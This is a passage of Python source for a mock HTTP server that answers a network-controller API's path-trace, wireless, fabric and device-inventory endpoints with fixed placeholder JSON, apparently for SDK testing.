'string'}], 'result': 'string'}], 'result': 'string'}, 'ingressAclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'wirelessLanControllerId': 'string', 'wirelessLanControllerName': 'string'}, 'id': 'string', 'ingressInterface': {'physicalInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'virtualInterface': [{'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}]}, 'ip': 'string', 'linkInformationSource': 'string', 'name': 'string', 'perfMonCollection': 'string', 'perfMonCollectionFailureReason': 'string', 'perfMonitorStatistics': [{'byteRate': 0, 'destIpAddress': 'string', 'destPort': 'string', 'inputInterface': 'string', 'ipv4DSCP': 'string', 'ipv4TTL': 0, 'outputInterface': 'string', 'packetBytes': 0, 'packetCount': 0, 'packetLoss': 0, 'packetLossPercentage': 0, 'protocol': 'string', 'refreshedAt': 0, 'rtpJitterMax': 0, 'rtpJitterMean': 0, 'rtpJitterMin': 0, 'sourceIpAddress': 'string', 'sourcePort': 'string'}], 'role': 'string', 'ssid': 'string', 'tunnels': ['string'], 'type': 'string', 'wlanId': 'string'}], 'properties': ['string'], 'request': {'controlPath': True, 'createTime': 0, 'destIP': 'string', 'destPort': 'string', 'failureReason': 'string', 'id': 'string', 'inclusions': ['string'], 'lastUpdateTime': 0, 'periodicRefresh': True, 'protocol': 'string', 'sourceIP': 'string', 'sourcePort': 'string', 'status': 'string'}}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PATH_TRACE_8a9d2b76443b914e(self):
return re.search(
self.PATH_TRACE_8a9d2b76443b914e_PATTERN,
self.path
)
def path_trace_deletes_pathtraceby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PATH_TRACE_a395fae644ca899c(self):
return re.search(
self.PATH_TRACE_a395fae644ca899c_PATTERN,
self.path
)
def path_trace_initiateanew_pathtrace_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'flowAnalysisId': 'string', 'taskId': 'string', 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_07913b7f4e1880de(self):
return re.search(
self.NON_FABRIC_WIRELESS_07913b7f4e1880de_PATTERN,
self.path
)
def non_fabric_wireless_provision_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionUrl': 'string', 'provisioningTasks': {'success': ['string'], 'failed': ['string']}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_20872aec43b9bf50(self):
return re.search(
self.NON_FABRIC_WIRELESS_20872aec43b9bf50_PATTERN,
self.path
)
def non_fabric_wireless_update_wireless_profile_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_6896993e41b8bd7a(self):
return re.search(
self.NON_FABRIC_WIRELESS_6896993e41b8bd7a_PATTERN,
self.path
)
def non_fabric_wireless_get_wireless_profile_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps([{'profileDetails': {'name': 'string', 'sites': ['string'], 'ssidDetails': [{'name': 'string', 'type': 'Guest', 'enableFabric': True, 'flexConnect': {'enableFlexConnect': True, 'localToVlan': 0}, 'interfaceName': 'string'}]}}])
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_a0be3a2f47ab9f3c(self):
return re.search(
self.NON_FABRIC_WIRELESS_a0be3a2f47ab9f3c_PATTERN,
self.path
)
def non_fabric_wireless_update_provision_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionUrl': 'string', 'provisioningTasks': {'success': ['string'], 'failed': ['string']}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_ae86a8c14b5980b7(self):
return re.search(
self.NON_FABRIC_WIRELESS_ae86a8c14b5980b7_PATTERN,
self.path
)
def non_fabric_wireless_delete_wireless_profile_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_47ba59204e0ab742(self):
return re.search(
self.NON_FABRIC_WIRELESS_47ba59204e0ab742_PATTERN,
self.path
)
def non_fabric_wireless_create_wireless_profile_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_db9f997f4e59aec1(self):
return re.search(
self.NON_FABRIC_WIRELESS_db9f997f4e59aec1_PATTERN,
self.path
)
def non_fabric_wireless_createand_provision_ssid_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_c7a6592b4b98a369(self):
return re.search(
self.NON_FABRIC_WIRELESS_c7a6592b4b98a369_PATTERN,
self.path
)
def non_fabric_wireless_delete_enterprise_ssid_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_cca098344a489dfa(self):
return re.search(
self.NON_FABRIC_WIRELESS_cca098344a489dfa_PATTERN,
self.path
)
def non_fabric_wireless_deleteandprovision_ssid_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_cca519ba45ebb423(self):
return re.search(
self.NON_FABRIC_WIRELESS_cca519ba45ebb423_PATTERN,
self.path
)
def non_fabric_wireless_get_enterprise_ssid_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps([{'instanceUuid': 'string', 'version': 0, 'ssidDetails': [{'name': 'string', 'wlanType': 'string', 'enableFastLane': True, 'securityLevel': 'string', 'authServer': 'string', 'passphrase': 'string', 'trafficType': 'string', 'enableMACFiltering': True, 'isEnabled': True, 'isFabric': True, 'fastTransition': 'string', 'radioPolicy': 'string', 'enableBroadcastSSID': True}], 'groupUuid': 'string', 'inheritedGroupUuid': 'string', 'inheritedGroupName': 'string'}])
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NON_FABRIC_WIRELESS_8a96fb954d09a349(self):
return re.search(
self.NON_FABRIC_WIRELESS_8a96fb954d09a349_PATTERN,
self.path
)
def non_fabric_wireless_create_enterprise_ssid_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_FABRIC_WIRED_1e80bb50430b8634(self):
return re.search(
self.FABRIC_WIRED_1e80bb50430b8634_PATTERN,
self.path
)
def fabric_wired_deletesborderdevicefrom_sda_fabric_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'status': 'string', 'description': 'string', 'executionStatusUrl': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_FABRIC_WIRED_a4b56a5f478a97dd(self):
return re.search(
self.FABRIC_WIRED_a4b56a5f478a97dd_PATTERN,
self.path
)
def fabric_wired_addsborderdevicein_sda_fabric_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'status': 'string', 'description': 'string', 'executionStatusUrl': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_FABRIC_WIRED_d0b3593c4a7aaf22(self):
return re.search(
self.FABRIC_WIRED_d0b3593c4a7aaf22_PATTERN,
self.path
)
def fabric_wired_getsborderdevicedetailsfrom_sda_fabric_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'status': 'string', 'description': 'string', 'payload': {'id': 'string', 'instanceId': 0, 'authEntityId': 0, 'displayName': 'string', 'authEntityClass': 0, 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'createTime': 0, 'deployed': True, 'isSeeded': True, 'isStale': True, 'lastUpdateTime': 0, 'name': 'string', 'namespace': 'string', 'provisioningState': 'string', 'resourceVersion': 0, 'targetIdList': [{}], 'type': 'string', 'cfsChangeInfo': [{}], 'customProvisions': [{}], 'configs': [{}], 'managedSites': [{}], 'networkDeviceId': 'string', 'roles': ['string'], 'saveWanConnectivityDetailsOnly': True, 'siteId': 'string', 'akcSettingsCfs': [{}], 'deviceInterfaceInfo': [{}], 'deviceSettings': {'id': 'string', 'instanceId': 0, 'displayName': 'string', 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'connectedTo': [{}], 'cpu': 0, 'dhcpEnabled': True, 'externalConnectivityIpPool': 'string', 'externalDomainRoutingProtocol': 'string', 'internalDomainProtocolNumber': 'string', 'memory': 0, 'nodeType': ['string'], 'storage': 0, 'extConnectivitySettings': [{'id': 'string', 'instanceId': 0, 'displayName': 'string', 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'externalDomainProtocolNumber': 'string', 'interfaceUuid': 'string', 'policyPropagationEnabled': True, 'policySgtTag': 0, 'l2Handoff': [{}], 'l3Handoff': [{'id': 'string', 'instanceId': 0, 'displayName': 'string', 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'localIpAddress': 'string', 'remoteIpAddress': 'string', 'vlanId': 0, 'virtualNetwork': {'idRef': 'string'}}]}]}, 'networkWideSettings': {'id': 'string', 'instanceId': 0, 'displayName': 'string', 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'aaa': [{}], 'cmx': [{}], 'dhcp': [{'id': 'string', 'ipAddress': {'id': 'string', 'paddedAddress': 'string', 'addressType': 'string', 'address': 'string'}}], 'dns': [{'id': 'string', 'domainName': 'string', 'ip': {'id': 'string', 'paddedAddress': 'string', 'addressType': 'string', 'address': 'string'}}], 'ldap': [{}], 'nativeVlan': [{}], 'netflow': [{}], 'ntp': [{}], 'snmp': [{}], 'syslogs': [{}]}, 'otherDevice': [{}], 'transitNetworks': [{'idRef': 'string'}], 'virtualNetwork': [{}], 'wlan': [{}]}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_0db7da744c0b83d8(self):
return re.search(
self.DEVICES_0db7da744c0b83d8_PATTERN,
self.path
)
def devices_get_module_infoby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'assemblyNumber': 'string', 'assemblyRevision': 'string', 'attributeInfo': {}, 'containmentEntity': 'string', 'description': 'string', 'entityPhysicalIndex': 'string', 'id': 'string', 'isFieldReplaceable': 'UNKNOWN', 'isReportingAlarmsAllowed': 'UNKNOWN', 'manufacturer': 'string', 'moduleIndex': 0, 'name': 'string', 'operationalStateCode': 'string', 'partNumber': 'string', 'serialNumber': 'string', 'vendorEquipmentType': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_1c894b5848eab214(self):
return re.search(
self.DEVICES_1c894b5848eab214_PATTERN,
self.path
)
def devices_delete_deviceby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_3b9ef9674429be4c(self):
return re.search(
self.DEVICES_3b9ef9674429be4c_PATTERN,
self.path
)
def devices_sync_devicesusingforce_sync_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_20b19b52464b8972(self):
return re.search(
self.DEVICES_20b19b52464b8972_PATTERN,
self.path
)
def devices_get_devicelist_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_288df9494f2a9746(self):
return re.search(
self.DEVICES_288df9494f2a9746_PATTERN,
self.path
)
def devices_get_device_interface_vlans_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'interfaceName': 'string', 'ipAddress': 'string', 'mask': 0, 'networkAddress': 'string', 'numberOfIPs': 0, 'prefix': 'string', 'vlanNumber': 0, 'vlanType': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_38bd0b884b89a785(self):
return re.search(
self.DEVICES_38bd0b884b89a785_PATTERN,
self.path
)
def devices_get_polling_intervalforalldevices_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_349c888443b89a58(self):
return re.search(
self.DEVICES_349c888443b89a58_PATTERN,
self.path
)
def devices_get_device_interfacesbyspecifiedrange_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_3d923b184dc9a4ca(self):
return re.search(
self.DEVICES_3d923b184dc9a4ca_PATTERN,
self.path
)
def devices_get_device_interface_count_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_4bb22af046fa8f08(self):
return re.search(
self.DEVICES_4bb22af046fa8f08_PATTERN,
self.path
)
def devices_add_device_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_4eb56a614cc9a2d2(self):
return re.search(
self.DEVICES_4eb56a614cc9a2d2_PATTERN,
self.path
)
def devices_get_interfacedetails_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_5b8639224cd88ea7(self):
return re.search(
self.DEVICES_5b8639224cd88ea7_PATTERN,
self.path
)
def devices_get_device_interfacecountbyid_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_5db21b8e43fab7d8(self):
return re.search(
self.DEVICES_5db21b8e43fab7d8_PATTERN,
self.path
)
def devices_get_device_count_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_70ad397649e9b4d3(self):
return re.search(
self.DEVICES_70ad397649e9b4d3_PATTERN,
self.path
)
def devices_get_ospfinterfaces_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_82918a1b4d289c5c(self):
return re.search(
self.DEVICES_82918a1b4d289c5c_PATTERN,
self.path
)
def devices_get_polling_intervalby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_84b37ae54c59ab28(self):
return re.search(
self.DEVICES_84b37ae54c59ab28_PATTERN,
self.path
)
def devices_get_organizationlistfor_meraki_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': ['string'], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_81bb4804405a8d2f(self):
return re.search(
self.DEVICES_81bb4804405a8d2f_PATTERN,
self.path
)
def devices_get_functional_capabilityby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'attributeInfo': {}, 'functionDetails': [{'attributeInfo': {}, 'id': 'string', 'propertyName': 'string', 'stringValue': 'string'}], 'functionName': 'string', 'functionOpState': 'UNKNOWN', 'id': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_84ad8b0e42cab48a(self):
return re.search(
self.DEVICES_84ad8b0e42cab48a_PATTERN,
self.path
)
def devices_get_isisinterfaces_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_84b33a9e480abcaf(self):
return re.search(
self.DEVICES_84b33a9e480abcaf_PATTERN,
self.path
)
def devices_get_device_configby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 'string', 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_819f9aa54feab7bf(self):
return re.search(
self.DEVICES_819f9aa54feab7bf_PATTERN,
self.path
)
def devices_get_device_summary_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'id': 'string', 'role': 'string', 'roleSource': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_8fa8eb404a4a8d96(self):
return re.search(
self.DEVICES_8fa8eb404a4a8d96_PATTERN,
self.path
)
def devices_get_deviceby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_ba9dc85b4b8a9a17(self):
return re.search(
self.DEVICES_ba9dc85b4b8a9a17_PATTERN,
self.path
)
def devices_get_interfaceinfoby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
